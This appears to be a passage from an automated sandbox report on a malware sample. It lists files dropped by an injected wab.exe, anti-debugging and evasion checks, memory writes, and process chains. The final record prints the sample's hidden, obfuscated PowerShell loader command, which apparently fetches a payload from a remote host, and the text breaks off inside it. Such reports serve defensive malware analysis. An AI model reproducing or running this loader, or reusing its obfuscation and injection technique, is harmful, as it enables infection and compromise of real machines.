              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\chrome.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5784 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6456 | Thread sleep count: 5923 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6968 | Thread sleep count: 3920 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 748 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: wab.exe, 00000009.00000002.2787822130.0000000006958000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWX
Source: wab.exe, 00000009.00000002.2787822130.000000000699D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWTwQ
Source: powershell.exe, 00000002.00000002.2595858284.0000025070A47000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2787822130.00000000069BD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: amsi64_1716.amsi.csv, type: OTHER
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1716, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5572, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4340000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 30AFAB0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sanguinarily='sub';$sanguinarily+='strin';$colour = 1;$sanguinarily+='g';function circuted($kropsvisiteret26){$blazer=$kropsvisiteret26.length-$colour;for($tvrfljte=5;$tvrfljte -lt $blazer;$tvrfljte+=6){$intraperitoneally+=$kropsvisiteret26.$sanguinarily.invoke( $tvrfljte, $colour);}$intraperitoneally;}function udkrte($udmatningens){ . ($polarizer) ($udmatningens);}$ontological=circuted 'alenlmgynobo animzcopiei dekll unbrlkaramad,esk/ abso5 edrr.c.apt0clemp notc(dru,nwunifoinailenpr.madco.seounbuiwsheepsfrste metalnundertl ndq prede1scrip0postt.penty0 dra.;gidsl spnd,wp ddii.rembnba ng6 ,ram4b roc;rkebi raasxtermt6 d.ej4 kn.r;ringt lassordiscjvca.bi:archt1bicen2aftgt1o,tol. sile0sulfo)diver prof.g,fglaepen,acfalk,k fi,honethi/admir2encin0griff1 tram0cytis0m,tro1lufti0kben 1mech, forblfdr.gaigkantrd,mmee forrf gelsoslag,x sia./lande1 un i2denot1baand. e eb0 sost ';$pullouts=circuted ' eva,u,epouslu tlenondermange- mellacamorgbkarveto.fun unpotzeppe ';$skraaremmens=circuted 'gim ehlusketsidettsamlepcalcas bo.i: circ/lseti/truthwbackfwregiswubesl. 
karisdec neineq nco kadberylsriotep lichaadaptcjenh,eglott.bademca osto .aktmd.ght/hydropdecimrh,spiodamas/homeod.aretlxerot/ desiivi li4gjord1 freealupan7 alvf6 loes ';$spisestel=circuted 'bolte>cubin ';$polarizer=circuted 's irriflykkera,idxkonst ';$spiegeleisen='decephalize';$thermoremanent12 = circuted ' hecte frejc,vigehprem,oudtry udska%klemea folkpnogggpagnindgvenda.odsetregloaarchi%krimi\uv.askunivelnonada mishv palbetal,yromop sgassl.b,dstuapostedyppen eino .verl& sprj&te,no scane kongc modehpollaojejun varu twindi ';udkrte (circuted 'nonsy$indisgferiel,anneougeraboutlaaanti l,rist:willynmytolo,rocenun ersstilitbraktuunsh d fascysurli=kdest(beforcprotom overdvolde flers/unde.cdisin whabb$ g,amthjemmh aralescarvrse uemusnobokardirroeddeperi,mhenhrai,difnlurefegerman .omet ,lle1over 2sub.e) ,und ');udkrte (circuted 'averr$luf,egfaerdltaphvobru.sbarchpa flytl diss:turneptautoaresigrgorinasel.kpnonaronrmeldrev,l=co.on$akkusssuperk c enractedaoplseaaf,kir ilmedi tam gattm t.leelrlinnsk,bsspopul. fyris u 